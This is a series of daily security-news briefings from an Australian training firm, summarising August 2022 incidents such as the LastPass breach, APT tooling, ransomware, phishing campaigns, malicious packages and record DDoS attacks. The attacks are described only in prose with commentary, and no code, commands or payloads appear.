Les Bell and Associates Pty Ltd

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Atlassian Bitbucket RCE Vulnerability

Atlassian's developers must be feeling somewhat punch-drunk by now, after so many disclosures. Now security researcher 'The Grand Pew' has disclosed, via Bugcrowd's bug bounty program, a command injection vulnerability affecting all versions between 7.0.0and 8.3.0 of the company's git-based source code repository server, Bitbucket.

Users are advised to upgrade promptly; failing that, they should turn off public repositories. The vulnerability affects multiple API endpoints in Bitbucket.

Haworth, Jessica, Critical command injection vulnerability discovered in Bitbucket Server and Data Center, The Daily Swig, 26 August 2022. Available online at https://portswigger.net/daily-swig/critical-command-injection-vulnerability-discovered-in-bitbucket-server-and-data-center.

Clouds Gather Over LastPass

The popular password safe application, LastPass, has suffered yet another breach, this time affecting the source code to its source code. As in previous breaches, the company can claim - justifiably - that no user data has been compromised, as all its customers' passwords are encrypted under each customer's master password.

However, in this case, the attackers were able to compromise a developer account to gain access to "portions of source code and some proprietary LastPass technical information".This makes the breach a good test of Kerchoff's Second Principle - "security of an encryption system must depend upon the secrecy of a key and not upon secrecy of the system" - because whoever got that source code and technical info is going to be poring over it in search of some kind of implementation weakness or other exploitable vulnerability. LastPass customer data is probably OK, but I'm glad to be using a different product.

Seals, Tara, LastPass Suffers Data Breach, Source Code Stolen, Dark Reading, 27 August 2022. Available online at https://www.darkreading.com/cloud/lastpass-data-breach-source-code-stolen.

Log4J Still a Problem

The Iranian threat actor Static Kitten (a.k.a. MuddyWater, Cobalt Ulster, Mercury and others) is targeting Israeli orgaizations running unpatched versions of Log4j. It might seem incredible that the long-known Log4Shell exploit would still be exploitable, but the fact that Log4j is embedded in so many systems, and that most enterprises do not have a configuration management system capable of reporting whether they have Log4j installed, and if so, where, indicates that this vulnerability is likely to be a thorn in our sides for some time to come.

Lakshamanan, Ravie, Iranian Hackers Exploiting Unpatched Log4j 2 Bugs to Target Israeli Organizations, The Hacker News, 27 August 2022. Available online at https://thehackernews.com/2022/08/iranian-hackers-exploiting-unpatched.html.

Return-to-Work and Catch COVID?

While many managers, and some corporations, are struggling with how to manage employees working from home, the idea of a full return to work is deeply unattractive to many. Case in point: Google, which in April demanded employees return to the office for at least three days a week.

The result? Increased outbreaks of COVID-19 - currently, Google's LA offices are recording the most infections of any employer in that city, with 145 cases at their Venice office and 135 in the Playa Vista campus. Employees, fed up with the number of exposure notifications they are receiving, point out that the company has been recording record growth while they worked from home.

Complicating things further, unvaccinated employees are asking the company to drop its vaccination mandate for on-prem workers. Vaccinated staffers who would rather work from home anyway are doubtless really impressed with this.

Elias, Jennifer, Google employees frustrated after office Covid outbreaks, some call to modify vaccine policy, CNBC, 26 August 2022. Available online at https://www.cnbc.com/2022/08/26/google-employees-frustrated-after-office-covid-outbreaks.html.

Disinformation Bad - Meta-Disinformation Worse

An opinion piece by a RAND Corporation information scientist points out that the capabilities of artificial intelligence and the immersive nature of virtual reality will combine to make disinformation campaigns much more influential and effective. Rand Waltzman describes a scenario in which an audience watches a political candidate giving a speech - but unknown to them, each viewer sees a subtly different version of the candidate - one which has been modified to make his facial features slightly more similar to the viewers, a technique which has been shown experimentally to make voters rate the candidate more favourably.

The author also points out that virtual environments are seductive because of two features - presence and embodiment. Presence means that the clues that a computer is mediating communication are no longer present - communication feels very direct - while embodiment is the sensation that the virtual body is the actual body. This makes emotional manipulation of the participant very much more powerful than traditional media and social media - and we should have learned by now just how dangerous those can be.

Waltzman, Rand, Facebook MisInformation is Bad Enough. The Metaverse Will Be Worse, The RAND Blog, 22 August 2022. Available online at https://www.rand.org/blog/2022/08/facebook-misinformation-is-bad-enough-the-metaverse.html.

The next few days' Security News may appear at odd times, as travel interferes with the work cycle.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Spearphishing Group Targets South Korean Politicians and Diplomats

South Korean academics, diplomats and government officials are yet again being targeted by the North Korean group Kimusky, otherwise known as GoldDragon. The group is using targeted emails which contain macro-enabled MS Word documents which, when opened, will download a Visual Basic script from a C2 server. The script profiles the victim's computer and will then fetch additional payloads. 

Interestingly, if the user clicks on a link which promises additional interesting documents, the link submits their email address - and if this is of no interest to the attacker, it then returns an uninfected document, indicating a highly target approach.

Lakshamanan, Ravie, Researchers Uncover Kamusky Infra Targeting South Korean Politicians and Diplomats, The Hacker News, 25 August 2022. Available online at https://thehackernews.com/2022/08/researchers-uncover-kimusky-infra.html.

Okta IAM Breach Implications Spread

The phishing attack, based on fake Okta sign-in pages, that caught Twilio employees early this month continues to ripple throughout industry. The attackers were able to fool many employees into handing over the login credentials and thereby gain access to Twilio internal systems. However, the same breach has been revealed to have affected 25 organisations so far, including Cloudflare, Signal and Mailchimp; others may not even realise they have been compromised.

The breach may cause many to rethink the use of federated identity management systems and cloud SaaS IAM services. For Cloudflare, the saving grace was their requiring FIDO U2F security keys to access their internal systems.

Seals, Tara, Twilio Hackers Scarf 10K Okta Credentials in Sprawling Supply Chain Attack, Dark Reading, 26 August 2022. Available online at https://www.darkreading.com/remote-workforce/twilio-hackers-okta-credentials-sprawling-supply-chain-attack.

Cozy Bear Tool Blows Through Active Directory Federation Services

Russian state-sponsored group APT 29 (Cozy Bear, Nobelium) has been discovered using a new tool called 'Magic Web' that allows hackers to create accounts and masquerade as any user on a network that uses Active Directory Federation Services. The tool works by replacing the Microsoft.IdentityServer.Diagnostics.dll' file with a back-doored version. The new version runs initialization code that hooks into the server and allows attackers to force Active Directory to accept any client certificate they create as being valid and add fraudulent claims for those certificates.

This is an extremely potent attack against enterprises that use ADFS, but only those specifically targeted by the threat actor are likely to encounter it. Simple IoC's are unlikely to work for this sophisticated attacker, so potential victims need to ensure their threat hunters know what to look for.

Uncredited, MagicWeb: NOBELIUM's post-compromise trick to authenticate as anyone, Microsoft Security, 24 August 2022. Available online at https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/.

New Group for Women CISO's and Senior Execs

At the 2014 RSA Conference a small group of senior women, dismayed that the dominant form of female representation there was as 'booth babes', started a Facebook group in an attempt to get away from this lazy approach to marketing. The movement has grown over the years, now formally establishing an advocacy and education non-profit to further the aims of the community.

The Forte Group aims to elevate the positive role of cybersecurity in business, offering board level governance and connections. The group will also offer career assistance and mentoring to women in cybersecurity and privacy.

Jackson Higgins, Kelly, Senior-Level Women Leaders in Cybersecurity Form New Nonprofit, Dark Reading, 26 August 2022. Available online at https://www.darkreading.com/remote-workforce/senior-level-women-leaders-cybersecurity-nonprofit.

The next few days' Security News may appear at odd times, as travel interferes with the work cycle.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Mudge Drops Twitter Right In It

As Elon Musk alleges that Twitter executives are clueless about the number of bots on the platform, former Twitter CSO Peiter "Mudge" Zatko has sent documents to US Congress, the Federal Trade Commission, the SEC and the Department of Justice alleging that the social media platform is rife with security problems such as a lack of adequate access controls and security governance.

In the 200-page document, Zatko alleges that Twitter engineers have unfettered access to the company's production systems and that the company's procedures for data center recovery are lax or non-existent. He further says that security oversight is so weak that some of the company's employees may even be agents of foreign governments. Twitter for, its part, claims that all is right with its world, that Zatko does not understand its SEC reporting requirements, and that this is a case of sour grapes. Security professionals who have known Mudge for decades are not so sure.

O'Sullivan, Donie at. al., Ex-Twitter exec blows the whistle, alleging reckless and negligent cybersecurity policies, CNN Business, 23 August 2022. Available online at https://edition.cnn.com/2022/08/23/tech/twitter-whistleblower-peiter-zatko-security/index.html.

Iranian APT's New Tool Plunders Google, Outlook, Yahoo Accounts

Google's Threat Analysis Group has found that APT 35, variously known as Charming Kitten, Yellow Garuda and Cobalt Illusion, and associated with the Iranian Revolutionary Guard Corps, has developed a new tool which allows it to rapidly extract the contents of email accounts.

The HYPERSCRAPE tool, which is written in a .NET language, requires the attacker to have acquired a session using the victim's credentials, perhaps by means of a cookie-stealing attack. Once this has been done, the program can systematically plunder the victim's mailbox, downloading all the emails but resetting the status to 'unread' where required. It also deletes emails which it sees contain security alerts, to keep the victim in the dark about the compromise. It's not sophisticated, but it's certainly effective.

Lakshamanan, Ravie, Google Uncovers Tool Used by Iranian Hackers to Steal Data from Email Accounts, The Hacker News, 23 August 2022. Available online at https://thehackernews.com/2022/08/google-uncovers-tool-used-by-iranian.html.

Dominican Republic Hit By Ransomware

The organization within the Department of Agriculture of the Dominican Republic that is responsible for agricultural reform has been hit by a ransomware attack. The Quantum ransomware is really a derivative of MountLocker, and the group behind it is yet another offshoot of the Conti ransomware gang.

All the servers of the Instituto Agrario Dominicano (IAD) were encrypted in the attack, with $US600,000 demanded for the key. However, the organization is unlikely to be able to afford to pay the ransom; it could not afford more than the most basic antivirus software and has no dedicated security personnel.

Abrams, Lawrence, Quantum ransomware attack disrupts govt agency in Dominican Republic, Bleeping Computer, 24 August 2022. Available online at https://www.bleepingcomputer.com/news/security/quantum-ransomware-attack-disrupts-govt-agency-in-dominican-republic/.

Adversary-in-the-Middle Attacks Target 365, Workspace Users

An as-yet-unidentified threat actor is running a large campaign against senior executives of companies who use Microsoft 365 and Google Workspace enterprise accounts. The initial spear-phishing part of the campaign works by sending the victims fake emails from the DocuSign email agreement platform; the "Review Document" button takes them to a fake login page which functions as a proxy to capture their credentials and also break the multi factor authentication process.

One this has been done, the attackers add a second authentication device to the account, and then use some sophisticated social engineering to insert themselves into conversation threads, posing as legitimate. In the final, highly-targeted part of the process, they generate an email to the target, informing them that a bank account they were to make a payment to has been frozen for audit, and providing updated payment details for an account which they control.

Toulas, Bill, Hackers use AiTM attack to monitor Microsoft 365 accounts for BEC scams, Bleeping Computer, 24 August 2022. Available online at https://www.bleepingcomputer.com/news/security/hackers-use-aitm-attack-to-monitor-microsoft-365-accounts-for-bec-scams/.

Lakshamanan, Ravie, Researchers Warn of AiTM Attack Targeting Google G-Suite Enterprise Users, The Hacker News, 24 August 2022. Available online at https://thehackernews.com/2022/08/researchers-warn-of-aitm-attack.html.

The next few days' Security News may appear at odd times, as travel interferes with the work cycle.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Counterfeit Phones Harbour WhatsApp Back Doors

Antivirus firm Dr. Web has discovered a number of low-end Android smartphones which carry pre-installed malware intended to target the WhatsApp and WhatsApp Business messaging apps. The phones, which are designed and named to mimic some high-end models, are popular in Asia, as is WhatsApp. This type of phone is also often picked up as a spare by travellers for use with a local SIM.

The back doors are present in the system partition of the phones, which actually have an outdated version of Android installed. One of the main Android system libraries has been slightly modified so that, when called from an application, it loads a trojan from the file libmtd.so. This checks to see which appplication caused it to load, and if it is WhatsApp or the "Settings" or "Phone" system apps, it then proceeds to load a second-stage trojan, which sends system information to a C2 server, which replies with a list of available plugins. From there, the trojan has full access to the application's files and can read chat messages, send spam, intercept and listen to phone calls and many other actions.

Uncredited, Doctor Web identifies attack on WhatsApp and WhatsApp Business messengers installed on counterfeit Android devices, Dr. Web, 22 August 2022. Available online at https://news.drweb.com/show/?i=14542&lng=en.

Residential Proxies Used for Credential Stuffing Attacks

The FBI and Australian Federal Police have jointly warned that threat actors are using proxies on residential service provider networks to run credential stuffing attacks. By doing this, rather than repeatedly using a single IP address, they make it hard for firewalls to identify and rate limit the attacks.

Naive home users are often attracted to install proxy software on the promise that they will be pooling their bandwidth with that of other users and will therefore be able to enjoy faster downloads or earn some money from selling their unused bandwidth. This is, of course, technical nonsense - your cable modem or ADSL connection is a single pipe of fixed 'diameter' and you cannot get more through it by using someone else's pipe that links them to the Internet. Nevertheless, having installed the software, they now represent an opportunity for cyber criminals.

Residential networks are also a more likely source for web traffic; firewalls are more likely to block attempted logons from data center networks - although having said that, I routinely observe attempts to send traffic through the mod_proxy module on my own web servers.

Uncredited, Proxies and Configurations Used for Credential Stuffing Attacks on Online Customer Accounts, FBI Private Industry Notification, 18 August 2022. Available online at https://www.ic3.gov/Media/News/2022/220818.pdf.

New Malware Combines RAT, Spyware and Ransomware

A new remote access trojan called Borat RAT has additional capabilities, being able to download a ransomware payload to the victim's machine and also run as a keylogger. The malware, discovered and named by Cyble, can also operate as a remote proxy, credential stealer and trojan dropper. It has a few other tricks which seem primarily intended to annoy or intimidate its victim, such as turning the monitor on and off, hiding and unhiding the taskbar and start button. It can also record audio and video if a microphone and webcam are discovered.

Uncredited, Meet Borat RAT, a New Unique Triple Threat, The Hacker News, 22 August 2022. Available online at https://thehackernews.com/2022/08/meet-borat-rat-new-unique-triple-threat.html.

Yet Another Air Gap Technique

Dr. Mordechai Guri of Ben Gurion University of the Negev, who specialises in devising incredibly ingenious techniques for exfiltrating data across air gaps, has come up with yet another. This time, he has used the micro-electro-mechanical gyroscope found in many smartphones to pick up ultrasonic tones which are generated by a nearby infected computer and demodulate them into binary data. By using the gyroscope, the exploit avoids using the microphone, which is highly protected - the gyroscope is generally regarded as safe for apps to use.

Dr Guri's experiments show that, after infecting the victim computer, perhaps via a compromised USB key, attackers can exfiltrate sensitive data over a few meters of air gap, using this 'speakers-to-gyroscope' covert channel. By now, Dr. Guri and his research group have pretty much demolished the notion that information cannot be exfiltrated from a computer that is not connected to any kind of network or communications link.

Guri, Mordechai, GAIROSCOPE: Injecting Data from Air-Gapped Computers to Nearby Gyroscopes, 18th Intl. Conf. on Privacy, Security and Trust (PST), Auckland, 21 December 2021. Available online at https://arxiv.org/abs/2208.09764.

The next few days' Security News may appear at odd times, as travel interferes with the work cycle.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Ancient Linux Vuln Allows Privilege Escalation

Bitcoin Stolen from General Bytes ATM's

Unknown hackers have been able to exploit a fairly obvious vulnerability in the Crypto Application Server that controls General Bytes Bitcoin ATM's, and thereby steal cryptocurrencies from the ATM customers. The hack was achieved by the simple act of calling an admin URL that is used for initial installation of the server and creates the first admin user. By calling this API and creating an admin user called 'gb', the attackers were then able to modify the 'buy', 'sell' and 'invalid payment address' settings to use a crypto wallet that they controlled.

From that point on, any cryptocurrencies received by the ATM went to the hackers, rather than the intended destination.

The moral of the story? Review any installation scripts and remove them after installation has been completed. Allow admin access only from trusted subnets. And, of course, patch proactively.

Abrams, Lawrence, Hackers steal crypto from Bitcoin ATM's by exploiting zero-day bug, Bleeping Computer, 20 August 2022. Available online at https://www.bleepingcomputer.com/news/security/hackers-steal-crypto-from-bitcoin-atms-by-exploiting-zero-day-bug/.

LatentBot Mutates Into Grandoreiro

LatentBot is a trojan that dates back to 2013; written in Delphi, it has a modular design that allows it to download additional modules for keystroke logging, cookie-stealing and remote access. Since June 2022, a new derivative called Grandoreiro has appeared, targeting companies in Spanish-speaking countries with official-looking emails apparently from government agencies.

The victims are directed to download and share a document, but in practice, the link redirects to a malicious domain and then downloads a ZIP file containing the Grandoreiro loader. The loader goes through a number of antiforensics checks, such as walking through a list of currently executing processes, looking for malware analysis tools, seeing if it is being run from a particular directory, looking for debuggers and reading from an I/O port which is used by VMWare.

If all of this succeeds, it gathers some basic information, checks for the presence of crypto wallets which it will investigate later and then fetches the main payload. This uses even more antiforensics techniques - for example, it includes two tightly-compressed bitmapped images which, when expanded, inflate the resulting binary to over 400 MBytes, which exceeds the size limit for most execution sandboxes.

From there on, Grandoreiro communicates with its C2 network in exactly the same way as LatentBot, and can download any of a huge selection of backdoor capabilities.

Shivtarkar, Niraj, Grandoreiro Banking Trojan with New TTPs Targeting Various Industry Verticals, Zscaler ThreatLabz blog, 18 August 2022. Available online at https://www.zscaler.com/blogs/security-research/grandoreiro-banking-trojan-new-ttps-targeting-various-industry-verticals.

More Info on Mēris

Google has released a bit more information about last week's massive DDoS attack by the Mēris botnet. Apparently there were 5,256 source IP addresses from 132 countries engaged in the attack - approximately 22% of them Tor exit nodes (although these accounted for only 3% of the traffic). As previously mentioned, the use of TLS/SSL required the connections to be terminated in order to inspect the traffic, only relatively few TLS handshakes were required due to the use of HTTP pipelining, which sends multiple requests over a single HTTP connection.

Google Cloud Armor's 'Adaptive Protection' feature was apparently able to quickly identify the attack, alert the customer and recommend a protective rule - in this case, rate-limiting the connections, which would still allow legitimate traffic.

Kiner, Emil and Satya Kondaru, How Google Cloud blocked the largest Layer 7 DDoS attack at 46 million rps, Google Cloud blog, 19 August 2022. Available online at https://cloud.google.com/blog/products/identity-security/how-google-cloud-blocked-largest-layer-7-ddos-attack-at-46-million-rps.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Chip Makers Take On PQCrypto

We have written here before about the need for cryptographic agility - the ability to replace those public-key crypto algorithms that are expected to fall, sooner or later, to quantum cryptanalysis. That's a challenge, because most of the quantum-resistant algorithms are compute-intensive, but desktop, laptop and cloud server machines should be able to cope without too much difficulty.

However, the same is not true for the small, low-powered, system-on-a-chip devices that power the Internet of Things. This is especially true for the smart cards used as credit cards, access badges, etc., which will require specialised hardware to be able to perform acceptably. In the first part of an interview, Joppe W. Bos, senior principal cryptographer at NXP Semiconductor, explains some of the challenges - as co-creator of the CRYSTALS-Kyber algorithm recently adopted by NIST for standardization, he is in a unique position to describe the challenges.

Valerio, Pablo, Post-Quantum Cryptography needs to be ready to protect IoT, IoT Times, 17 August 2022. Available online at https://iot.eetimes.com/post-quantum-cryptography-needs-to-be-ready-to-protect-iot/.

Intel Adds CPU Circuitry to Defeat Power-On Attacks

Processors that incorporate a Trusted Platform Module have an obscure vulnerability in which an attacker manipulates the voltage supplied to the CPU at just the right time - as it is loading the firmware for its security engine. By triggering an error condition just then, the attacker could get the security engine to load malicious firmware, which would then grant the attacker to some data, such as biometric templates, stored in the TPM.

Now Intel is adding a tunable replica circuit to the company's 12th generation Alder Lake Core processors, which correlates the times and voltages at which the various circuits on a motherboard power up, and if they don't match, will generate an error and failsafe reset. The circuit is being added to these laptop processors because the attack - which remains theoretical at this stage - requires physical access to the motherboard, something that is harder to achieve for server and desktop machines.

Shah, Agam, Intel Adds New Circuits to Chips to Ward Off Motherboard Exploits, Dark Reading, 20 August 2022. Available online at https://www.darkreading.com/dr-tech/intel-adds-new-circuit-to-chips-to-ward-off-motherboard-exploits.

Fake Cloudflare DDoS Protection Pages Trick Users Into Installing Trojans

Occasionally, when visiting a busy web site, you will see a Cloudflare DDoS protection page that holds you up for a few seconds, as a way of rate-limiting bots which are attempting to overwhelm the site with bogus requests. In a new social engineering twist, hackers are using weakly protected WordPress sites to host an obfuscated JavaScript payload that displays the Cloudflare DDoS page - but then asks the visitor to click on a button to bypass the delay. This downloads a container file called 'security_install.iso', which the victim is told installs a program called DDOS GUARD that will get them faster access.

In fact, this is actually a link to the first of a chain of Windows PowerShell scripts which culminate with installing the NetSupport remote access trojan and the Raccoon Stealer password stealer on the victim's system.

Defensive techniques include better hardening WordPress sites, and educating users to never install programs that scareware messages are prompting them to download.

Toulas, Bill, WordPress sites hacked with fake Cloudflare DDoS alerts pushing malware, Bleeping Computer, 20 August 2022. Available online at https://www.bleepingcomputer.com/news/security/wordpress-sites-hacked-with-fake-cloudflare-ddos-alerts-pushing-malware/.

Gimme Cookie! Want Cookie!

A timely reminder that web security ultimately depends on cookies, which are vulnerable to a variety of stealing attacks. Although authentication to a web site might involve multi-factor authentication, once that has been done, everything depends on those cookies. And because those cookies can be quite long-lived - who wants to have to log in to a web site every few minutes? - markets are emerging where cookies are sold. Low-end cybercriminals can operate malware like Raccoon Stealer and RedLine Stealer, but may not have the sophistication to be able to make use of the credentials once they have acquired them - so they sell them on.

Once generated by a server, the cookies are also stored by the browser, usually in an SQLite database which may also store user ID and passwords. A variety of techniques can be used by the attacker to extract the cookies, which can then be used to take over MS Office 365 and Google Workspace sessions, among others.

Perhaps it's time for us to accept the inconvenience of having to re-authenticate more frequently in order to minimise the likelihood of this attack?

Gallagher, Sean, Cookie stealing: the new perimeter bypass, Sophos X-Ops, 18 August 2022. Available online at https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass/.

Attribution Insights from IBM X-Force Research

A fascinating deep dive into malware analysis from IBM X-Force Research shows how the Bumblebee malware, which first appeared last year, was probably developed from the source code of the Ramnit banking trojan. What is interesting about this - apart from the malware coding techniques uncovered - is that Bumblebee has been linked to offshoots of the Conti ransomware group. which fragmented following a series of high profile leaks of chat messages and the doxxing of some group members.

This suggests that the various spinoffs from Conti are forming new alliances and acquiring new TTP's, possibly heralding completely new attacks. The report makes fascinating reading for those who enjoy reverse-engineering malware.

Hammond, Charlotte and Ole Villadsen, From Ramnit to Bulblebee (via NeverQuest): Similarities and Code Overlap Shed Light on Relationships Between Malware Developers, IBM Security Intelligence, 18 August 2022. Available online at https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest/.

Online Scammers Often Victims Themselves

While we are all familiar with tech support scammers operating out of Mumbai, it seems that a new breed of financial scammers has arisen, operating out of Laos, Myanmar and Cambodia under the control of Taiwanese and Chinese scam bosses. In Cambodia, for example, giant casinos built to lure Chinese gamblers found themselves near-empty due to COVID travel restrictions and were re-purposed as scam operations, staffed by migrant workers lured by fraudulent job ads or even abducted off the street, and who are now held against their will in slave conditions.

The trafficked workers are forced to work from 8 am to 11 pm each day, and threatened or beaten if they do not raise enough money from their victims; trying to leave is dangerous, with some being killed and others recaptured. The gang bosses are well connected, both politically and to local police, who are notoriously lax in investigating or even side with the bosses. This is an untimely reminder that cybercrime isn't just about bits of information and purely financial gain, but sometimes crosses over into people trafficking, slavery and worse.

Kennedy, Lindsey and Nathan Paul Southern, The online scammer targeting you could be trapped in a South-East Asian fraud factory, The Sydney Morning Herald, 21 August 2022. Available online at https://www.smh.com.au/world/asia/the-online-scammer-targeting-you-could-be-trapped-in-a-south-east-asian-fraud-factory-20220818-p5baz3.html.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

New Variant of Jaca Malware Is Highly Configurable

An updated variant of the Jaca malware toolkit includes new components which form a long chain of actions to infect a victim's system, according to security consultancy Morphisec. The Windows toolkit has been used extensively by a South Asian threat actor called DoNot Team or APT-C-35, and they keep improving it.

The latest variant makes use of RTF (Rich Text Format) documents that trick the user into enabling macros. This then allows a macro to inject some shellcode into memory and that, in turn, downloads a second stage loader from its C2 server. It then downloads a DLL file from another C2 server, which sends system information back to its operators, makes itself persistent via a Scheduled Task and finally downloads the real payload, which will selectively exfiltrate data such as keystrokes, screenshots, files and browser data, using loadable modules.

This modularity gives DoNot Team considerable flexibility in adapting their malware, which they use to attack defence, diplomatic, government and military organizations in India, Pakistan, Sri Lanka and Bangladesh.

Cohen, Hido and Arnold Osipov, APT-C-35 Gets a New Upgrade, Morphisec Breach Prevention Blog, 11 August 2022. Available online at https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed.

Cryptominers Spread Via Python Repositories

Software developer and researcher Hauke Lübbers 'stumbled across', and security firm Sonatype has confirmed a threat actor who has deployed at least 241 malicious npm (Node Package Manager) and PyPI (the Python Package Index). The packages all bear similar names to popular open source projects like React and argparse, but actually will download and install the XMRig cryptominer to generate Monero crypto. All the packages were published by an account called '17b4a931'.

However, you would have to wonder about the abilities of a developer who would mistake 'r2act' for 'React'.

Sharma, Ax, More than 200 cryptomining packages flood npm and PyPI registry, Sonatype, 19 August 2022. Available online at https://blog.sonatype.com/more-than-200-cryptominers-flood-npm-and-pypi-registry.

Threat Actor Targets Hospitality and Travel

A small threat actor called TA558 is operating in Latin America, North America and Western Europe, targeting hospitality, travel and related industries. The group uses malmails written in Portuguese, Spanish and sometimes English, enquiring about reservations - something recipients cannot afford to ignore. However, the attachment is one of over 15 different malware payloads the group uses - mostly remote access trojans that can be used for reconnaisance, information exfiltration and the dropping of more advanced payloads.

The group has been active since at least 2018, but has ramped up its efforts in 2022, perhaps because post-COVID recovery travel growth offers them increased opportunities. They have also switched TTP's, from Word macros (now usually disabled) to malware such as Load, Revenge RAT and others, hosted at URL's or enclosed in container formats such as RAR and ISO files.

Wise, Joe, et. al., Reservations Requested: TA558 Targets Hospitality and Travel, Proofpoint blog, 18 August 2022. Available online at https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel.

Cozy Bear Targets Foreign Policy Info in Microsoft 365

Russian state-backed APT 29, aka Cozy Bear, has been busy this year, with new advanced TTP's which it uses to compromise Microsoft 365 accounts. The attackers used a brute-force attack on the self-enrollment process for MFA in Azure Active Directory to discover the usernames and passwords that had not yet logged into a domain, and then enrolled their own devices. Having done this, they were then free to roam around the domain.

In order to evade detection, the hackers also disabled the 'Purview Audit' feature which logs details of email accesses. They also used Azure VM's to run their exploits, making their activities hard to distinguish from all the regular traffic within the Azure networks - they all use Microsoft IP addresses.

Bienstock, Douglas, You Can't Audit Me: APT29 Continues Targeting Microsoft 365, Mandiant blog, 18 August 2022. Available online at https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft.

JWST Runs JavaScript. JavaScript?

While we all marvel at the stunning images being sent from the James Webb Space Telescope, it's interesting to reflect on the fact that the scripts that control the imaging instruments are actually written in JavaScript - actually a variant called Nombas ScriptEase 5.00e which was last updated in January 2003.

This really should not come as a big surprise - the JWST has been in development since 1989 and when construction started in 2004, Nombas ScriptEast 5.00e would have been less than two years old. It's not unusual for government and major scientific projects to use quite old and stable technology - NASA has in the past been known to search second-hand component markets for parts like 8086 processors, while other parts of government were still using VAXen long after the rest of the world had moved on.

Clark, Mitchell, The James Webb Space Telescope runs JavScript, apparently, The Verge, 18 August 2022. Available online at https://www.theverge.com/2022/8/18/23206110/james-webb-space-telescope-javascript-jwst-instrument-control.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

New Record HTTPS DDoS Attack

A massive DDoS attack, using the SSL/TLS protocol, was directed at one of Google's Cloud Armor DDoS protection customers in early June. The 69-minute attack started by sending 10,000 requests per second to the load balancer, but by 10 minutes later it had risen to a peak of 46 million requests per second - equivalent to receiving all the daily requests to Wikipedia within 10 seconds.

The attack seems to have been delivered by the Mēris botnet, although this is more than twice the rate it has previously achieved. Mēris works by using unsecured proxies to deliver traffic, and using TLS/SSL requires both the botnet and the victim to use a lot of compute power for key exchanges.

